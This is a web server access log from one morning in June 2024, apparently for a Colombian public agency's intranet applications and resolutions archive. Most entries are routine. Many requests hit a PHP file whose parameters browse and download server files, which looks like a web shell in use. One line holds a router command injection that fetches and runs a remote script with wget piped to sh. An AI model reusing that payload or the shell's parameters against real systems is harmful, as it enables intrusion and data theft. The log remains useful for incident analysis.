186.29.33.66 - - [29/Jun/2024:09:56:01 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:56:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 83343
186.29.33.66 - - [29/Jun/2024:09:56:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:56:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:56:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:56:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:56:05 -0500] "GET /sipsesda/ HTTP/1.1" 302 201
186.86.33.204 - - [29/Jun/2024:09:56:06 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/adicionarSupervisor.xhtml HTTP/1.1" 200 79655
186.86.33.204 - - [29/Jun/2024:09:56:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:56:10 -0500] "GET /sipsesda/ HTTP/1.1" 200 1477
186.29.33.66 - - [29/Jun/2024:09:56:10 -0500] "GET /css/segobdis.css HTTP/1.1" 404 1264
186.29.33.66 - - [29/Jun/2024:09:56:10 -0500] "GET /sipsesda/faces/login.jspx HTTP/1.1" 200 6587
186.86.33.204 - - [29/Jun/2024:09:56:11 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 148171
186.86.33.204 - - [29/Jun/2024:09:56:11 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:56:12 -0500] "POST /sipsesda/faces/login.jspx HTTP/1.1" 200 5705
47.128.113.249 - - [29/Jun/2024:09:56:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Chuelladecarbono%5C&f=._huella_carbono.html&ft=download&white=1 HTTP/1.1" 200 4096
186.29.33.66 - - [29/Jun/2024:09:56:18 -0500] "POST /sipsesda/faces/vista/sistema/seleccionRol.jspx HTTP/1.1" 200 28229
186.29.33.66 - - [29/Jun/2024:09:56:19 -0500] "GET /sipsesda/js/menu.js HTTP/1.1" 200 5358
186.29.33.66 - - [29/Jun/2024:09:56:19 -0500] "GET /sipsesda/js/jquery-latest.js HTTP/1.1" 200 92556
186.29.33.66 - - [29/Jun/2024:09:56:19 -0500] "GET /sipsesda/js/menu13_compact.js HTTP/1.1" 200 22980
186.29.33.66 - - [29/Jun/2024:09:56:19 -0500] "GET /sipsesda/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
186.86.33.204 - - [29/Jun/2024:09:56:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 32313
186.86.33.204 - - [29/Jun/2024:09:56:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:56:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1380
186.29.33.66 - - [29/Jun/2024:09:56:22 -0500] "GET /sipsesda/faces/vista/sistema/cargarMenu.jspx?accionMenu=listadoFuncionario&menuID=18 HTTP/1.1" 200 28436
186.29.33.66 - - [29/Jun/2024:09:56:23 -0500] "POST /sipsesda/faces/vista/sistema/cargarMenu.jspx HTTP/1.1" 200 32331
66.249.66.13 - - [29/Jun/2024:09:56:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2140.pdf HTTP/1.1" 200 357429
216.244.66.195 - - [29/Jun/2024:09:56:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/00657.pdf HTTP/1.1" 200 523093
47.128.55.101 - - [29/Jun/2024:09:56:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4778.pdf&ft=download HTTP/1.1" 200 335527
47.128.19.32 - - [29/Jun/2024:09:56:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3623.pdf&ft=download HTTP/1.1" 200 1113766
216.245.221.92 - - [29/Jun/2024:09:56:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:09:56:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
207.46.13.7 - - [29/Jun/2024:09:57:11 -0500] "GET /Publicaciones/2023EE207827.pdf HTTP/1.1" 404 228
66.249.66.12 - - [29/Jun/2024:09:57:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0842.pdf HTTP/1.1" 200 353316
66.249.66.11 - - [29/Jun/2024:09:57:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4958.pdf HTTP/1.1" 200 1087272
201.245.192.253 - - [29/Jun/2024:09:57:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:57:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:09:56:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.13 - - [29/Jun/2024:09:58:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4323.pdf HTTP/1.1" 200 447999
172.22.2.4 - - [29/Jun/2024:09:57:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [29/Jun/2024:09:58:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:09:58:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0208.pdf HTTP/1.1" 200 332794
66.249.66.11 - - [29/Jun/2024:09:58:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4693.pdf HTTP/1.1" 200 489847
47.128.97.145 - - [29/Jun/2024:09:59:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2743.pdf&ft=download HTTP/1.1" 200 20135
47.128.112.141 - - [29/Jun/2024:09:59:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1488.pdf&ft=download HTTP/1.1" 200 20135
66.249.66.11 - - [29/Jun/2024:09:59:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1066.pdf HTTP/1.1" 200 529558
47.128.116.94 - - [29/Jun/2024:09:59:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1218.pdf&ft=download HTTP/1.1" 200 20135
66.249.66.12 - - [29/Jun/2024:09:59:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5102.pdf HTTP/1.1" 200 344698
201.245.192.253 - - [29/Jun/2024:09:59:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:59:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.21.233 - - [29/Jun/2024:09:59:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1151-1200&f=00001190.tif&ft=download HTTP/1.1" 200 20131
201.245.192.253 - - [29/Jun/2024:10:00:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.17.193 - - [29/Jun/2024:10:00:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150625-1506-418000.txt&ft=download HTTP/1.1" 200 816
66.249.66.11 - - [29/Jun/2024:10:00:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4550.pdf HTTP/1.1" 200 346848
66.249.66.12 - - [29/Jun/2024:10:00:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%2051-100/2002RES54.tif HTTP/1.1" 200 342046
66.249.66.11 - - [29/Jun/2024:10:00:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4065.pdf HTTP/1.1" 200 493068
47.128.125.81 - - [29/Jun/2024:10:00:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Chuelladecarbono%5C&f=descargas.html&ft=download HTTP/1.1" 200 5786
186.29.33.66 - - [29/Jun/2024:10:00:34 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/listadoFuncionario.jspx HTTP/1.1" 200 32638
186.29.33.66 - - [29/Jun/2024:10:00:38 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/listadoFuncionario.jspx HTTP/1.1" 200 11264
186.29.33.66 - - [29/Jun/2024:10:00:38 -0500] "GET /sipsesda/adf/jsLibs/resources/LocaleElements_es_CO10_1_3_4_0.js HTTP/1.1" 200 824
201.245.192.253 - - [29/Jun/2024:10:00:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:10:01:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1069.pdf HTTP/1.1" 200 362606
66.249.66.13 - - [29/Jun/2024:10:01:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0561.pdf HTTP/1.1" 200 467906
186.29.33.66 - - [29/Jun/2024:10:01:36 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/registrarFuncionario.jspx?_afPfm=1 HTTP/1.1" 200 13358
186.29.33.66 - - [29/Jun/2024:10:01:36 -0500] "GET /sipsesda/adf/jsLibs/ScriptEval10_1_3_4_0.js HTTP/1.1" 200 551
207.46.13.107 - - [29/Jun/2024:10:01:43 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
216.245.221.92 - - [29/Jun/2024:10:01:50 -0500] "HEAD / HTTP/1.1" 200 -
186.29.33.66 - - [29/Jun/2024:10:01:52 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/registrarFuncionario.jspx?_afPfm=1 HTTP/1.1" 200 32856
186.29.33.66 - - [29/Jun/2024:10:01:54 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/listadoFuncionario.jspx HTTP/1.1" 200 16815
201.245.192.253 - - [29/Jun/2024:10:01:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.29.33.66 - - [29/Jun/2024:10:01:57 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/registrarFuncionario.jspx?_afPfm=2 HTTP/1.1" 200 11403
186.29.33.66 - - [29/Jun/2024:10:01:57 -0500] "GET /sipsesda/adf/images/dfb.gif HTTP/1.1" 200 194
186.29.33.66 - - [29/Jun/2024:10:01:58 -0500] "GET /sipsesda/faces/__ADFv__?_afPfm=2.1&_t=fred&_red=cd&value=1719673346845&loc=es-CO&enc=UTF-8&minValue=1136073600000&maxValue=1845892800000 HTTP/1.1" 200 1074
201.245.192.253 - - [29/Jun/2024:10:01:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.29.33.66 - - [29/Jun/2024:10:01:58 -0500] "GET /sipsesda/faces/__ADFv__?_afPfm=2.1&_t=cd&maxValue=1845892800000&minValue=1136073600000&value=1719673346845&loc=es-CO&enc=UTF-8 HTTP/1.1" 200 7244
66.249.66.12 - - [29/Jun/2024:10:02:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0896.pdf HTTP/1.1" 200 344703
66.249.66.11 - - [29/Jun/2024:10:02:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3457.pdf HTTP/1.1" 200 1642293
186.29.33.66 - - [29/Jun/2024:10:02:04 -0500] "POST /sipsesda/faces/vista/administracion/dependenciaFuncionario/registrarDependenciaFuncionario.jspx?_afPfm=2.1 HTTP/1.1" 200 13259
186.29.33.66 - - [29/Jun/2024:10:02:11 -0500] "POST /sipsesda/faces/vista/administracion/dependenciaFuncionario/registrarDependenciaFuncionario.jspx?_afPfm=2.1 HTTP/1.1" 200 17317
186.29.33.66 - - [29/Jun/2024:10:02:13 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/registrarFuncionario.jspx?_afPfm=2 HTTP/1.1" 200 8642
186.29.33.66 - - [29/Jun/2024:10:02:21 -0500] "POST /sipsesda/faces/vista/administracion/rolFuncionario/registrarRolFuncionario.jspx?_afPfm=2.2 HTTP/1.1" 200 17723
66.249.66.13 - - [29/Jun/2024:10:02:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2484.pdf HTTP/1.1" 200 406984
186.29.33.66 - - [29/Jun/2024:10:02:32 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/registrarFuncionario.jspx?_afPfm=2 HTTP/1.1" 200 32873
110.249.201.119 - - [29/Jun/2024:10:02:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CAnexos+estudio+Organizacional+SDA%5CANEXO+No.+4+-+ENCUESTA+DE+AN%C1LISIS+ORGANIZACIONAL%5C&f=ENCUESTA_DIRECCI%D3N+DE+PLANEACI%D3N+Y+SISTEMAS+INFORM%C1TICOS+AMBIENTALES+%2CDOC.doc&ft=img HTTP/1.1" 200 20128
13.215.34.172 - - [29/Jun/2024:10:02:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CAnexos+estudio+Organizacional+SDA%5CANEXO+No.+4+-+ENCUESTA+DE+AN%C1LISIS+ORGANIZACIONAL%5C&f=ENCUESTA_DIRECCI%D3N+DE+PLANEACI%D3N+Y+SISTEMAS+INFORM%C1TICOS+AMBIENTALES+%2CDOC.doc&ft=img HTTP/1.1" 200 20128
201.245.192.253 - - [29/Jun/2024:10:02:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:10:03:19 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [29/Jun/2024:10:03:25 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
186.154.46.227 - - [29/Jun/2024:10:03:32 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
186.154.46.227 - - [29/Jun/2024:10:03:32 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
66.249.66.12 - - [29/Jun/2024:10:03:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2268.pdf HTTP/1.1" 200 352402
186.29.33.66 - - [29/Jun/2024:10:03:37 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/listadoFuncionario.jspx HTTP/1.1" 200 32331
186.154.46.227 - - [29/Jun/2024:10:03:42 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 513755
186.29.33.66 - - [29/Jun/2024:10:03:47 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 163
186.29.33.66 - - [29/Jun/2024:10:03:47 -0500] "GET /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 61437
186.29.33.66 - - [29/Jun/2024:10:03:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
186.29.33.66 - - [29/Jun/2024:10:03:47 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
186.29.33.66 - - [29/Jun/2024:10:03:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:03:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:03:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:03:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:03:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
186.29.33.66 - - [29/Jun/2024:10:03:47 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
186.29.33.66 - - [29/Jun/2024:10:03:47 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
186.29.33.66 - - [29/Jun/2024:10:03:47 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
172.22.2.4 - - [29/Jun/2024:10:02:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.29.33.66 - - [29/Jun/2024:10:03:53 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 47860
186.29.33.66 - - [29/Jun/2024:10:03:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:03:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:03:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:03:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:10:03:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.29.33.66 - - [29/Jun/2024:10:03:57 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1952
201.245.192.253 - - [29/Jun/2024:10:03:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.29.33.66 - - [29/Jun/2024:10:04:01 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1958
186.29.33.66 - - [29/Jun/2024:10:04:06 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1969
186.29.33.66 - - [29/Jun/2024:10:04:06 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1619
186.29.33.66 - - [29/Jun/2024:10:04:08 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1800
66.249.66.11 - - [29/Jun/2024:10:04:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5120.pdf HTTP/1.1" 200 442704
47.128.41.171 - - [29/Jun/2024:10:04:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0844.pdf&ft=download HTTP/1.1" 200 388775
172.22.2.4 - - [29/Jun/2024:10:03:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
186.29.33.66 - - [29/Jun/2024:10:04:46 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 61559
186.29.33.66 - - [29/Jun/2024:10:04:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:04:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:04:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:04:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:04:47 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
186.29.33.66 - - [29/Jun/2024:10:04:47 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
186.29.33.66 - - [29/Jun/2024:10:04:58 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 7798
201.245.192.253 - - [29/Jun/2024:10:04:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.56.164 - - [29/Jun/2024:10:04:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+701-750&f=00000728.tif&ft=download HTTP/1.1" 200 20131
186.29.33.66 - - [29/Jun/2024:10:04:59 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 24474
186.29.33.66 - - [29/Jun/2024:10:04:59 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 22153
186.29.33.66 - - [29/Jun/2024:10:05:00 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 8087
186.29.33.66 - - [29/Jun/2024:10:05:01 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 7806
66.249.66.11 - - [29/Jun/2024:10:05:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3372.pdf HTTP/1.1" 200 657863
66.249.66.11 - - [29/Jun/2024:10:05:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4667.pdf HTTP/1.1" 200 410279
186.29.33.66 - - [29/Jun/2024:10:05:02 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 17933
186.29.33.66 - - [29/Jun/2024:10:05:02 -0500] "GET /sipse/faces/javax.faces.resource/spacer/dot_clear.gif?ln=primefaces&v=4.0 HTTP/1.1" 200 42
186.29.33.66 - - [29/Jun/2024:10:05:02 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 44345
186.29.33.66 - - [29/Jun/2024:10:05:03 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 4288
201.245.192.253 - - [29/Jun/2024:10:05:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.29.33.66 - - [29/Jun/2024:10:05:09 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 201108
186.29.33.66 - - [29/Jun/2024:10:05:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.37.146 - - [29/Jun/2024:10:05:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2603.pdf&ft=download HTTP/1.1" 200 362432
185.191.127.212 - - [29/Jun/2024:10:05:17 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F93.123.72.16%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
186.29.33.66 - - [29/Jun/2024:10:05:23 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/actividad/crearActividad.xhtml HTTP/1.1" 200 87881
